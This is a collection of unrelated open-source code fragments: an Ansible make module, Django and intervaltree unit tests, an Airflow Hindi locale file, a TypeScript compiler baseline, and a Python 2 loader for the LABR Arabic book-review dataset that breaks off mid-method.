chdir: /home/ubuntu/cool-project
target: all
file: /some-project/Makefile
'''
RETURN = r'''# '''
from ansible.module_utils.six import iteritems
from ansible.module_utils.basic import AnsibleModule
def run_command(command, module, check_rc=True):
    """Execute *command* in the module's ``chdir`` directory.

    :param command: list of command arguments
    :param module: Ansible make module instance
    :param check_rc: fail the module automatically on non-zero exit
    :return: return code, stdout content, stderr content (both sanitized)
    """
    rc, stdout, stderr = module.run_command(
        command, check_rc=check_rc, cwd=module.params['chdir'])
    return rc, sanitize_output(stdout), sanitize_output(stderr)
def sanitize_output(output):
    """Normalize raw command output before passing it to
    ``module.fail_json``/``exit_json``.

    Returns the empty string when *output* is None; otherwise returns
    *output* with all trailing CR/LF characters stripped.

    :param output: output to sanitize
    :return: sanitized output
    """
    return '' if output is None else output.rstrip("\r\n")
def main():
    """Module entry point: run (or dry-run) the requested make target."""
    module = AnsibleModule(
        argument_spec=dict(
            target=dict(type='str'),
            params=dict(type='dict'),
            chdir=dict(type='path', required=True),
            file=dict(type='path'),
        ),
        supports_check_mode=True,
    )

    # Prefer GNU make ("gmake") where it exists (non-Linux OSes), falling
    # back to the system "make" otherwise.
    make_path = module.get_bin_path('gmake', required=False)
    if not make_path:
        make_path = module.get_bin_path('make', required=True)

    target = module.params['target']
    extra_params = module.params['params']
    if extra_params is not None:
        make_args = [k + '=' + str(v) for k, v in iteritems(extra_params)]
    else:
        make_args = []

    # Assemble the `make` invocation.
    if module.params['file'] is not None:
        command = [make_path, "--file", module.params['file'], target]
    else:
        command = [make_path, target]
    command.extend(make_args)

    # `make --question` exits non-zero when the target is out of date.
    rc, out, err = run_command(command + ['--question'], module, check_rc=False)

    if module.check_mode:
        # Dry run: only report whether make would do anything.
        changed = (rc != 0)
    elif rc == 0:
        # Target is already up to date; nothing to do.
        changed = False
    else:
        # Target is stale -- actually run make.
        rc, out, err = run_command(command, module, check_rc=True)
        changed = True

    # The return code is deliberately not reported: a non-zero rc would
    # already have triggered fail_json inside run_command, and reporting
    # a non-zero code here would mark the task failed despite success.
    module.exit_json(
        changed=changed,
        failed=False,
        stdout=out,
        stderr=err,
        target=module.params['target'],
        params=module.params['params'],
        chdir=module.params['chdir'],
        file=module.params['file']
    )
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
import unittest
from datetime import date, datetime, time, timedelta
from django.utils.dateparse import (
parse_date,
parse_datetime,
parse_duration,
parse_time,
)
from django.utils.timezone import get_fixed_timezone
class DateParseTests(unittest.TestCase):
    """Tests for parse_date(), parse_time() and parse_datetime()."""

    def test_parse_date(self):
        """Accept ISO and condensed date strings; malformed input returns
        None, while well-formed but out-of-range values raise ValueError."""
        # Valid inputs
        self.assertEqual(parse_date("2012-04-23"), date(2012, 4, 23))
        self.assertEqual(parse_date("2012-4-9"), date(2012, 4, 9))
        self.assertEqual(parse_date("20120423"), date(2012, 4, 23))
        # Invalid inputs
        self.assertIsNone(parse_date("2012423"))
        with self.assertRaises(ValueError):
            parse_date("2012-04-56")

    def test_parse_time(self):
        """Times may use ':' separators, '.' or ',' fraction separators,
        and condensed HHMMSS form; timezone offsets are parsed but dropped."""
        # Valid inputs
        self.assertEqual(parse_time("09:15:00"), time(9, 15))
        self.assertEqual(parse_time("091500"), time(9, 15))
        self.assertEqual(parse_time("10:10"), time(10, 10))
        self.assertEqual(parse_time("10:20:30.400"), time(10, 20, 30, 400000))
        self.assertEqual(parse_time("10:20:30,400"), time(10, 20, 30, 400000))
        self.assertEqual(parse_time("4:8:16"), time(4, 8, 16))
        # Time zone offset is ignored.
        self.assertEqual(parse_time("00:05:23+04:00"), time(0, 5, 23))
        # Invalid inputs
        self.assertIsNone(parse_time("00:05:"))
        self.assertIsNone(parse_time("00:05:23,"))
        self.assertIsNone(parse_time("00:05:23+"))
        self.assertIsNone(parse_time("00:05:23+25:00"))
        self.assertIsNone(parse_time("4:18:101"))
        self.assertIsNone(parse_time("91500"))
        with self.assertRaises(ValueError):
            parse_time("09:15:90")

    def test_parse_datetime(self):
        """Offsets ('Z', '+HH', '+HH:MM', '+HHMM', with optional space)
        map to fixed-offset timezones; no offset yields a naive datetime."""
        valid_inputs = (
            ("2012-04-23", datetime(2012, 4, 23)),
            ("2012-04-23T09:15:00", datetime(2012, 4, 23, 9, 15)),
            ("2012-4-9 4:8:16", datetime(2012, 4, 9, 4, 8, 16)),
            (
                "2012-04-23T09:15:00Z",
                datetime(2012, 4, 23, 9, 15, 0, 0, get_fixed_timezone(0)),
            ),
            (
                "2012-4-9 4:8:16-0320",
                datetime(2012, 4, 9, 4, 8, 16, 0, get_fixed_timezone(-200)),
            ),
            (
                "2012-04-23T10:20:30.400+02:30",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(150)),
            ),
            (
                "2012-04-23T10:20:30.400+02",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(120)),
            ),
            (
                "2012-04-23T10:20:30.400-02",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(-120)),
            ),
            (
                "2012-04-23T10:20:30,400-02",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(-120)),
            ),
            (
                "2012-04-23T10:20:30.400 +0230",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(150)),
            ),
            (
                "2012-04-23T10:20:30,400 +00",
                datetime(2012, 4, 23, 10, 20, 30, 400000, get_fixed_timezone(0)),
            ),
            (
                "2012-04-23T10:20:30 -02",
                datetime(2012, 4, 23, 10, 20, 30, 0, get_fixed_timezone(-120)),
            ),
        )
        for source, expected in valid_inputs:
            with self.subTest(source=source):
                self.assertEqual(parse_datetime(source), expected)
        # Invalid inputs
        self.assertIsNone(parse_datetime("20120423091500"))
        with self.assertRaises(ValueError):
            parse_datetime("2012-04-56T09:15:90")
class DurationParseTests(unittest.TestCase):
    """Tests for parse_duration() across the supported input formats:
    Django's own "[DD] [HH:[MM:]]ss[.uuuuuu]", str(timedelta) output,
    PostgreSQL interval output, and ISO 8601 durations."""

    def test_parse_python_format(self):
        """str(timedelta) output round-trips through parse_duration()."""
        timedeltas = [
            timedelta(
                days=4, minutes=15, seconds=30, milliseconds=100
            ),  # fractions of seconds
            timedelta(hours=10, minutes=15, seconds=30),  # hours, minutes, seconds
            timedelta(days=4, minutes=15, seconds=30),  # multiple days
            timedelta(days=1, minutes=00, seconds=00),  # single day
            timedelta(days=-4, minutes=15, seconds=30),  # negative durations
            timedelta(minutes=15, seconds=30),  # minute & seconds
            timedelta(seconds=30),  # seconds
        ]
        for delta in timedeltas:
            with self.subTest(delta=delta):
                self.assertEqual(parse_duration(format(delta)), delta)

    def test_parse_postgresql_format(self):
        """PostgreSQL 'N day[s] [±]HH:MM:SS[.ffffff]' interval output."""
        test_values = (
            ("1 day", timedelta(1)),
            ("-1 day", timedelta(-1)),
            ("1 day 0:00:01", timedelta(days=1, seconds=1)),
            ("1 day -0:00:01", timedelta(days=1, seconds=-1)),
            ("-1 day -0:00:01", timedelta(days=-1, seconds=-1)),
            ("-1 day +0:00:01", timedelta(days=-1, seconds=1)),
            (
                "4 days 0:15:30.1",
                timedelta(days=4, minutes=15, seconds=30, milliseconds=100),
            ),
            (
                "4 days 0:15:30.0001",
                timedelta(days=4, minutes=15, seconds=30, microseconds=100),
            ),
            ("-4 days -15:00:30", timedelta(days=-4, hours=-15, seconds=-30)),
        )
        for source, expected in test_values:
            with self.subTest(source=source):
                self.assertEqual(parse_duration(source), expected)

    def test_seconds(self):
        """A bare number is interpreted as seconds."""
        self.assertEqual(parse_duration("30"), timedelta(seconds=30))

    def test_minutes_seconds(self):
        self.assertEqual(parse_duration("15:30"), timedelta(minutes=15, seconds=30))
        self.assertEqual(parse_duration("5:30"), timedelta(minutes=5, seconds=30))

    def test_hours_minutes_seconds(self):
        # Components larger than their usual range (e.g. 200 minutes)
        # are accepted and simply accumulated.
        self.assertEqual(
            parse_duration("10:15:30"), timedelta(hours=10, minutes=15, seconds=30)
        )
        self.assertEqual(
            parse_duration("1:15:30"), timedelta(hours=1, minutes=15, seconds=30)
        )
        self.assertEqual(
            parse_duration("100:200:300"),
            timedelta(hours=100, minutes=200, seconds=300),
        )

    def test_days(self):
        self.assertEqual(
            parse_duration("4 15:30"), timedelta(days=4, minutes=15, seconds=30)
        )
        self.assertEqual(
            parse_duration("4 10:15:30"),
            timedelta(days=4, hours=10, minutes=15, seconds=30),
        )

    def test_fractions_of_seconds(self):
        # Both '.' and ',' are accepted as the decimal separator.
        test_values = (
            ("15:30.1", timedelta(minutes=15, seconds=30, milliseconds=100)),
            ("15:30.01", timedelta(minutes=15, seconds=30, milliseconds=10)),
            ("15:30.001", timedelta(minutes=15, seconds=30, milliseconds=1)),
            ("15:30.0001", timedelta(minutes=15, seconds=30, microseconds=100)),
            ("15:30.00001", timedelta(minutes=15, seconds=30, microseconds=10)),
            ("15:30.000001", timedelta(minutes=15, seconds=30, microseconds=1)),
            ("15:30,000001", timedelta(minutes=15, seconds=30, microseconds=1)),
        )
        for source, expected in test_values:
            with self.subTest(source=source):
                self.assertEqual(parse_duration(source), expected)

    def test_negative(self):
        # A leading '-' on the whole value negates every component except
        # an explicit positive day count; '-' inside a component is invalid.
        test_values = (
            ("-4 15:30", timedelta(days=-4, minutes=15, seconds=30)),
            ("-172800", timedelta(days=-2)),
            ("-15:30", timedelta(minutes=-15, seconds=-30)),
            ("-1:15:30", timedelta(hours=-1, minutes=-15, seconds=-30)),
            ("-30.1", timedelta(seconds=-30, milliseconds=-100)),
            ("-30,1", timedelta(seconds=-30, milliseconds=-100)),
            ("-00:01:01", timedelta(minutes=-1, seconds=-1)),
            ("-01:01", timedelta(seconds=-61)),
            ("-01:-01", None),
        )
        for source, expected in test_values:
            with self.subTest(source=source):
                self.assertEqual(parse_duration(source), expected)

    def test_iso_8601(self):
        # Year/month designators are rejected (variable length); weeks,
        # days and time components are supported, with '.' or ',' fractions.
        test_values = (
            ("P4Y", None),
            ("P4M", None),
            ("P4W", timedelta(weeks=4)),
            ("P0.5W", timedelta(weeks=0.5)),
            ("P0,5W", timedelta(weeks=0.5)),
            ("-P0.5W", timedelta(weeks=-0.5)),
            ("P1W1D", timedelta(weeks=1, days=1)),
            ("P4D", timedelta(days=4)),
            ("-P1D", timedelta(days=-1)),
            ("P0.5D", timedelta(hours=12)),
            ("P0,5D", timedelta(hours=12)),
            ("-P0.5D", timedelta(hours=-12)),
            ("-P0,5D", timedelta(hours=-12)),
            ("PT5H", timedelta(hours=5)),
            ("-PT5H", timedelta(hours=-5)),
            ("PT5M", timedelta(minutes=5)),
            ("-PT5M", timedelta(minutes=-5)),
            ("PT5S", timedelta(seconds=5)),
            ("-PT5S", timedelta(seconds=-5)),
            ("PT0.000005S", timedelta(microseconds=5)),
            ("PT0,000005S", timedelta(microseconds=5)),
            ("-PT0.000005S", timedelta(microseconds=-5)),
            ("-PT0,000005S", timedelta(microseconds=-5)),
            ("-P4DT1H", timedelta(days=-4, hours=-1)),
            # Invalid separators for decimal fractions.
            ("P3(3D", None),
            ("PT3)3H", None),
            ("PT3|3M", None),
            ("PT3/3S", None),
        )
        for source, expected in test_values:
            with self.subTest(source=source):
                self.assertEqual(parse_duration(source), expected)
{
"auditLog": {
"columns": {
"event": "इवेंट",
"extra": "अतिरिक्त",
"user": "उपयोगकर्ता",
"when": "कब"
},
"filters": {
"eventType": "इवेंट प्रकार"
},
"title": "ऑडिट लॉग"
},
"xcom": {
"columns": {
"dag": "डैग",
"key": "कुंजी",
"value": "मान"
},
"title": "XCom"
}
} | json | github | https://github.com/apache/airflow | airflow-core/src/airflow/ui/public/i18n/locales/hi/browse.json |
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Jun 1, 2012.
"""
from everest.interfaces import IMime
from everest.mime import XmlMime
from everest.mime import get_registered_mime_strings
from everest.mime import get_registered_mime_type_for_extension
from everest.mime import get_registered_mime_type_for_name
from everest.mime import get_registered_mime_type_for_string
from everest.mime import get_registered_mime_types
from everest.mime import get_registered_representer_names
from everest.mime import register_mime_type
from everest.testing import Pep8CompliantTestCase
from zope.interface import provider # pylint: disable=E0611,F0401
__docformat__ = 'reStructuredText en'
__all__ = ['MimeTestCase',
]
class MimeTestCase(Pep8CompliantTestCase):
    """Tests for the MIME type registry in everest.mime."""

    def test_registry(self):
        """Registration rejects invalid/duplicate MIME classes and every
        lookup API can find the built-in XmlMime type."""
        # Classes that do not provide IMime, or that duplicate an already
        # registered type string, representer name or file extension,
        # must be rejected with ValueError.
        self.assert_raises(ValueError, register_mime_type,
                           MimeNotImplementingIMime)
        self.assert_raises(ValueError, register_mime_type,
                           MimeWithDuplicateTypeString)
        self.assert_raises(ValueError, register_mime_type,
                           MimeWithDuplicateNameString)
        self.assert_raises(ValueError, register_mime_type,
                           MimeWithDuplicateFileExtensionString)
        # XmlMime must be discoverable via all registry accessors.
        self.assert_true(XmlMime.mime_type_string
                         in get_registered_mime_strings())
        self.assert_true(XmlMime.representer_name
                         in get_registered_representer_names())
        self.assert_true(XmlMime in get_registered_mime_types())
        self.assert_true(
            get_registered_mime_type_for_string(XmlMime.mime_type_string)
            is XmlMime)
        self.assert_true(
            get_registered_mime_type_for_name(XmlMime.representer_name)
            is XmlMime)
        self.assert_equal(
            get_registered_mime_type_for_extension(XmlMime.file_extension),
            XmlMime)
# Deliberately does NOT provide IMime: register_mime_type must reject it.
class MimeNotImplementingIMime(object):
    pass
# Valid IMime provider whose mime_type_string collides with the already
# registered XmlMime ('application/xml'); registration must fail.
# NOTE(review): file_extension here lacks the leading dot the sibling
# classes use — presumably irrelevant to this test, but worth confirming.
@provider(IMime)
class MimeWithDuplicateTypeString(object):
    mime_type_string = 'application/xml'
    representer_name = 'myxml'
    file_extension = 'xmlish'
# Valid IMime provider whose representer_name collides with XmlMime's
# ('xml'); registration must fail.
@provider(IMime)
class MimeWithDuplicateNameString(object):
    mime_type_string = 'application/xmlish'
    representer_name = 'xml'
    file_extension = '.xmlish'
# Valid IMime provider whose file_extension collides with XmlMime's
# ('.xml'); registration must fail.
@provider(IMime)
class MimeWithDuplicateFileExtensionString(object):
    mime_type_string = 'application/xmlish'
    representer_name = 'myxml'
    file_extension = '.xml'
//// [tests/cases/compiler/classIndexer5.ts] ////
//// [classIndexer5.ts]
class Foo {
[key: string]: number;
#a: boolean;
#b = false;
}
//// [classIndexer5.js]
"use strict";
class Foo {
#a;
#b = false;
} | javascript | github | https://github.com/microsoft/TypeScript | tests/baselines/reference/classIndexer5.js |
"""
intervaltree: A mutable, self-balancing interval tree for Python 2 and 3.
Queries may be by point, by range overlap, or by range envelopment.
Test module: IntervalTree, removal of intervals
Submitted as issue #41 (Interval removal breaks this tree) by escalonn
Copyright 2013-2018 Chaim Leib Halbert
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
from intervaltree import IntervalTree
from test import data
import pytest
def test_sequence():
    """Replay the insertion/removal sequence from issue #41, verifying
    the tree's invariants after every single mutation."""
    t = IntervalTree()
    insertions = [
        (860, 917, 1),
        (860, 917, 2),
        (860, 917, 3),
        (860, 917, 4),
        (871, 917, 1),
        (871, 917, 2),
        (871, 917, 3),  # Value inserted here
        (961, 986, 1),
        (1047, 1064, 1),
        (1047, 1064, 2),
    ]
    for begin, end, value in insertions:
        t.addi(begin, end, value)
        t.verify()
    t.removei(961, 986, 1)
    t.verify()
    t.removei(871, 917, 3)  # Deleted here
    t.verify()
def test_structure():
    """
    Reconstruct the original tree just before the removals, then
    perform the removals.
    """
    # data.issue41_orig holds the exact tree snapshot reported in issue #41;
    # verify() checks the tree's structural invariants after each removal.
    t = data.issue41_orig.tree()
    t.verify()
    t.removei(961, 986, 1)
    t.verify()
    t.removei(871, 917, 3)
    t.verify()
# Allow running the structural regression directly as a script.
if __name__ == "__main__":
    # pytest.main([__file__, '-v'])
    test_structure()
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 10 16:27:03 2013
@author: Mohamed Aly <mohamed@mohamedaly.info>
"""
import codecs
import numpy as np
import pandas as pd
import re
class LABR:
    """Helpers for loading, cleaning and splitting the LABR Arabic
    book-review dataset (rating, review_id, user_id, book_id, body
    tab-separated records).

    NOTE(review): this is Python 2 code — it relies on print statements,
    unichr() and xrange() and will not run under Python 3 as-is.
    """

    def __init__(self):
        # File-system layout of the raw and processed review files.
        self.REVIEWS_PATH = "../data/labr_data/"
        self.RAW_REVIEWS_FILE = "raw_reviews.tsv"
        self.DELETED_REVIEWS_FILE = "deleted_reviews.tsv"
        self.CLEAN_REVIEWS_FILE = "reviews.tsv"
        self.CLEAN_NO_STOP_REVIEWS_FILE = "nostopwords_reviews"
        self.CLEAN_NO_STOP_STEMMED_REVIEWS_FILE = "nostopwords_stemmed_reviews"
        self.NORMALIZED_REVIEWS_FILE = "norm_reviews.tsv"

    # Copied from the PyArabic package.
    def arabicrange(self):
        """return a list of arabic characteres .
        Return a list of characteres between \u060c to \u0652
        @return: list of arabic characteres.
        @rtype: unicode;
        """
        mylist = [];
        for i in range(0x0600, 0x00653):
            try :
                mylist.append(unichr(i));
            except ValueError:
                pass;
        return mylist;

    # cleans a single review
    def clean_raw_review(self, body):
        """Return a cleaned copy of one review body, or u"" if the review
        should be discarded (e.g. it contains non-Arabic characters or is
        empty after stripping punctuation)."""
        # patterns to remove first
        pat = [\
            (u'http[s]?://[a-zA-Z0-9_\-./~\?=%&]+', u''), # remove links
            (u'www[a-zA-Z0-9_\-?=%&/.~]+', u''),
            # u'\n+': u' ', # remove newlines
            (u'<br />', u' '), # remove html line breaks
            (u'</?[^>]+>', u' '), # remove html markup
            # u'http': u'',
            (u'[a-zA-Z]+\.org', u''),
            (u'[a-zA-Z]+\.com', u''),
            (u'://', u''),
            (u'&[^;]+;', u' '),
            (u':D', u':)'),
            # (u'[0-9/]+', u''),
            # u'[a-zA-Z.]+': u'',
            # u'[^0-9' + u''.join(self.arabicrange()) + \
            # u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
            # u'\s^><\-_\u201D\u00AB=\u2026]+': u'', # remove latin characters
            (u'\s+', u' '), # remove spaces
            (u'\.+', u'.'), # multiple dots
            (u'[\u201C\u201D]', u'"'), # “
            (u'[\u2665\u2764]', u''), # heart symbol
            (u'[\u00BB\u00AB]', u'"'),
            (u'\u2013', u'-'), # dash
        ]
        # patterns that disqualify a review
        remove_if_there = [\
            (u'[^0-9' + u''.join(self.arabicrange()) + \
             u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
             u'\s\^><\-_\u201D\u00AB=\u2026+|' + \
             u'\u0660-\u066D\u201C\u201D' + \
             u'\ufefb\ufef7\ufef5\ufef9]+', u''), # non arabic characters
        ]
        # patterns that disqualify if empty after removing
        remove_if_empty_after = [\
            (u'[0-9a-zA-Z\-_]', u' '), # alpha-numeric
            (u'[0-9' + u".,!;:$%&*%'#(){}~`\[\]/\\\\\"" + \
             u'\s\^><`\-=_+]+', u''), # remove just punctuation
            (u'\s+', u' '), # remove spaces
        ]
        # remove again
        # patterns to remove
        pat2 = [\
            # u'[^0-9' + u''.join(self.arabicrange()) + \
            # u"!.,;:$%&*%'#(){}~`\[\]/\\\\\"" + \
            # u'\s^><\-_\u201D\u00AB=\u2026]+': u'', # remove latin characters
        ]
        skip = False
        # if empty body, skip
        if body == u'': skip = True
        # do some subsitutions
        for k, v in pat:
            body = re.sub(k, v, body)
        # remove if exist
        for k, v in remove_if_there:
            if re.search(k, body):
                skip = True
        # remove if empty after replacing
        for k, v in remove_if_empty_after:
            temp = re.sub(k, v, body)
            if temp == u" " or temp == u"":
                skip = True
        # do some more subsitutions
        if not skip:
            for k, v in pat2:
                body = re.sub(k, v, body)
        # if empty string, skip
        if body == u'' or body == u' ':
            skip = True
        if not skip:
            return body
        else:
            return u""

    # Read raw reviews from file and clean and write into clean_reviews
    def clean_raw_reviews(self):
        """Stream the raw TSV file, clean each review body, and write kept
        reviews to CLEAN_REVIEWS_FILE and rejected ones to
        DELETED_REVIEWS_FILE."""
        # input file
        in_file = codecs.open(self.REVIEWS_PATH + self.RAW_REVIEWS_FILE,
                              'r', encoding="utf-8")
        reviews = in_file.readlines()
        # Output file: rating<tab>content
        out_file = open(self.REVIEWS_PATH + self.CLEAN_REVIEWS_FILE,
                        'w', buffering=100)
        deleted_file = open(self.REVIEWS_PATH + self.DELETED_REVIEWS_FILE,
                            'w', buffering=100)
        counter = 1
        for i in xrange(0, len(reviews)):
            review = reviews[i]
            skip = False
            # # If line starts with #, then skip
            # if review[0] == u"#": continue
            # split by <tab>
            parts = review.split(u"\t")
            # rating is first part and body is last part
            rating = parts[0]
            review_id = parts[1]
            user_id = parts[2]
            book_id = parts[3]
            body = parts[4].strip()
            # clean body
            body = self.clean_raw_review(body)
            if body == u"": skip = True
            if i % 5000 == 0:
                print "review %d:" % (i)
            # write output
            line = u"%s\t%s\t%s\t%s\t%s\n" % (rating, review_id, user_id,
                                              book_id, body)
            if not skip:
                out_file.write(line.encode('utf-8'))
                counter += 1
            else:
                deleted_file.write(line.encode('utf-8'))

    # Read the reviews file. Returns a tuple containing these lists:
    #   rating: the rating 1 -> 5
    #   review_id: the id of the review
    #   user_id: the id of the user
    #   book_id: the id of the book
    #   body: the text of the review
    def read_review_file(self, file_name):
        reviews = codecs.open(file_name, 'r', 'utf-8').readlines()
        # remove comment lines and newlines
        reviews = [r.strip() for r in reviews if r[0] != u'#']
        # parse
        rating = list()
        review_id = list()
        user_id = list()
        book_id = list()
        body = list()
        for review in reviews:
            # split by <tab>
            parts = review.split(u"\t")
            # rating is first part and body is last part
            rating.append(int(parts[0]))
            review_id.append(parts[1])
            user_id.append(parts[2])
            book_id.append(parts[3])
            # some records have no body field; keep list lengths aligned
            if len(parts) > 4:
                body.append(parts[4])
            else:
                body.append(u"")
        return (rating, review_id, user_id, book_id, body)

    # Writes reviews to a file
    def write_review_file(self, file_name, rating, review_id, user_id,
                          book_id, body):
        lines = list()
        # loop
        for i in xrange(len(rating)):
            line = u"%s\t%s\t%s\t%s\t%s\n" % (rating[i], review_id[i],
                                              user_id[i], book_id[i],
                                              body[i])
            lines.append(line)
        open(file_name, 'w').write(u''.join(lines).encode('utf-8'))

    def read_clean_reviews(self):
        """Read the cleaned reviews TSV (see read_review_file)."""
        return self.read_review_file(self.REVIEWS_PATH +
                                     self.CLEAN_REVIEWS_FILE)

    def read_raw_reviews(self):
        """Read the raw (uncleaned) reviews TSV (see read_review_file)."""
        return self.read_review_file(self.REVIEWS_PATH + self.RAW_REVIEWS_FILE)

    # Splits the dataset into a training/test sets in the setting of using 5
    # classes (predicting the rating value from 1 to 5)
    def split_train_test_5class(self, rating, percent_test,
                                balanced="unbalanced"):
        # Fixed seed so splits are reproducible across runs.
        np.random.seed(1234)
        num_reviews = len(rating)
        review_ids = np.arange(0, num_reviews)
        if balanced == "unbalanced":
            ntest = np.floor(num_reviews * percent_test)
            np.random.shuffle(review_ids)
            test_ids = review_ids[:ntest]
            train_ids = review_ids[ntest:]
        elif balanced == "balanced":
            # Down-sample every class to the size of the rarest rating.
            (sizes, bins) = np.histogram(rating, [1, 2, 3, 4, 5, 6])
            min_size = np.min(sizes)
            print min_size
            # sample review ids equally among classes
            test_ids = np.zeros((0,), dtype="int32")
            train_ids = np.zeros((0,), dtype="int32")
            rating = np.array(rating)
            ntest = np.floor(min_size * percent_test)
            for c in range(1, 6):
                cids = review_ids[np.nonzero(rating == c)]
                np.random.shuffle(cids)
                test_ids = np.r_[test_ids, cids[:ntest]]
                train_ids = np.r_[train_ids, cids[ntest:min_size]]
        # Persist the chosen indices so experiments can reuse the split.
        train_file = self.REVIEWS_PATH + "5class-" + balanced + "-train.txt"
        test_file = self.REVIEWS_PATH + "5class-" + balanced + "-test.txt"
        open(train_file, 'w').write('\n'.join(map(str, train_ids)))
        open(test_file, 'w').write('\n'.join(map(str, test_ids)))
        return (train_ids, test_ids)

    # Splits the dataset into a training/test sets in the setting of using 2
    # classes (predicting the polarity of the review where ratings 1 & 2
    # are considered negative, ratings 4 & 5 are positive, and rating 3 is
    # ignored)
    def split_train_test_2class(self, rating, percent_test,
                                balanced="unbalanced"):
        np.random.seed(1234)
        rating = np.array(rating, dtype='int32')
        # length
        num_reviews = len(rating)
        review_ids = np.arange(0, num_reviews)
        # convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
        rating[rating == 2] = 1
        rating[rating == 4] = 5
        ids = (rating == 1) + (rating == 5)
        review_ids = review_ids[ids]
        rating = rating[ids]
        rating[rating == 1] = 0
        rating[rating == 5] = 1
        # get length after filtering
        num_reviews = rating.shape[0]
        if balanced == "unbalanced":
            ntest = np.floor(num_reviews * percent_test)
            np.random.shuffle(review_ids)
            test_ids = review_ids[:ntest]
            train_ids = review_ids[ntest:]
        elif balanced == "balanced":
            (sizes, bins) = np.histogram(rating, [0, 1, 2])
            min_size = np.min(sizes)
            print min_size
            # sample review ids equally among classes
            test_ids = np.zeros((0,), dtype="int32")
            train_ids = np.zeros((0,), dtype="int32")
            rating = np.array(rating)
            ntest = np.floor(min_size * percent_test)
            for c in [0, 1]:
                cids = review_ids[np.nonzero(rating == c)]
                np.random.shuffle(cids)
                test_ids = np.r_[test_ids, cids[:ntest]]
                train_ids = np.r_[train_ids, cids[ntest:min_size]]
        train_file = self.REVIEWS_PATH + "2class-" + balanced + "-train.txt"
        test_file = self.REVIEWS_PATH + "2class-" + balanced + "-test.txt"
        open(train_file, 'w').write('\n'.join(map(str, train_ids)))
        open(test_file, 'w').write('\n'.join(map(str, test_ids)))
        return (train_ids, test_ids)

    # Splits the dataset into a training/validation/test sets in the setting of using 3
    # classes (predicting the polarity of the review where ratings 1 & 2
    # are considered negative, ratings 4 & 5 are positive, and rating 3 is considered
    # neutral
    def split_train_validation_test_3class(self, rating, percent_test, percent_valid,
                                           balanced="unbalanced"):
        np.random.seed(1234)
        rating = np.array(rating, dtype='int32')
        # length
        num_reviews = len(rating)
        review_ids = np.arange(0, num_reviews)
        # convert to binary, with ratings [1, 2] --> neg and [4, 5] --> pos
        rating[rating == 2] = 1
        rating[rating == 4] = 5
        ids = (rating == 1) + (rating == 5) + (rating == 3)
        review_ids = review_ids[ids]
        rating = rating[ids]
        # remap to class labels: 0 = negative, 1 = positive, 2 = neutral
        rating[rating == 1] = 0
        rating[rating == 5] = 1
        rating[rating == 3] = 2
        # get length after filtering
        num_reviews = rating.shape[0]
        if balanced == "unbalanced":
            ntest = np.floor(num_reviews * percent_test)
            nvalid = np.floor(num_reviews * percent_valid)
            np.random.shuffle(review_ids)
            test_ids = review_ids[:ntest]
            validation_ids = review_ids[ntest:ntest + nvalid]
            train_ids = review_ids[ntest + nvalid:]
        elif balanced == "balanced":
            (sizes, bins) = np.histogram(rating, [0, 1, 2, 3])
            min_size = np.min(sizes)
            print min_size
            # sample review ids equally among classes
            test_ids = np.zeros((0,), dtype="int32")
            validation_ids = np.zeros((0,), dtype="int32")
            train_ids = np.zeros((0,), dtype="int32")
            rating = np.array(rating)
            ntest = np.floor(min_size * percent_test)
            nvalid = np.floor(min_size * percent_valid)
            for c in [0, 1, 2]:
                cids = review_ids[np.nonzero(rating == c)]
                np.random.shuffle(cids)
                test_ids = np.r_[test_ids, cids[:ntest]]
                validation_ids = np.r_[validation_ids, cids[ntest:ntest + nvalid]]
                train_ids = np.r_[train_ids, cids[ntest + nvalid:min_size]]
        train_file = self.REVIEWS_PATH + "3class-" + balanced + "-train.txt"
        test_file = self.REVIEWS_PATH + "3class-" + balanced + "-test.txt"
        validation_file = self.REVIEWS_PATH + "3class-" + balanced + "-validation.txt"
        open(train_file, 'w').write('\n'.join(map(str, train_ids)))
        open(test_file, 'w').write('\n'.join(map(str, test_ids)))
        open(validation_file, 'w').write('\n'.join(map(str, validation_ids)))
        return (train_ids, test_ids)

    # Reads a training or test file. The file contains the indices of the
    # reviews from the clean reviews file.
    def read_file(self, file_name):
        ins = open(file_name).readlines()
        ins = [int(i.strip()) for i in ins]
        return ins

    # A helpter function.
    def set_binary_klass(self, ar):
        # In-place remap: ratings {1,2} -> 0 (negative), {4,5} -> 1 (positive).
        ar[(ar == 1) + (ar == 2)] = 0
        ar[(ar == 4) + (ar == 5)] = 1

    # A helpter function.
    def set_ternary_klass(self, ar):
        # In-place remap: {1,2} -> 0, {4,5} -> 1, {3} -> 2 (neutral).
        ar[(ar == 1) + (ar == 2)] = 0
        ar[(ar == 4) + (ar == 5)] = 1
        ar[(ar == 3)] = 2

    # Returns (train_x, train_y, test_x, test_y)
    # where x is the review body and y is the rating (1->5 or 0->1)
    def get_train_test(self, klass="2", balanced="balanced"):
        (rating, a, b, c, body) = self.read_clean_reviews()
        rating = np.array(rating)
        body = pd.Series(body)
        train_file = (self.REVIEWS_PATH + klass + "class-" +
                      balanced + "-train.txt")
        test_file = (self.REVIEWS_PATH + klass + "class-" +
                     balanced + "-test.txt")
        train_ids = self.read_file(train_file)
        test_ids = self.read_file(test_file)
        train_y = rating[train_ids]
        test_y = rating[test_ids]
        train_x = body[train_ids]
        test_x = body[test_ids]
        if klass == "2":
            self.set_binary_klass(train_y)
            self.set_binary_klass(test_y)
        return (train_x, train_y, test_x, test_y)

    # Returns (train_x, train_y, test_x, test_y)
    # where x is the review body and y is the rating (1->5 or 0->1)
    def get_train_test_validation(self, klass="3", balanced="balanced"):
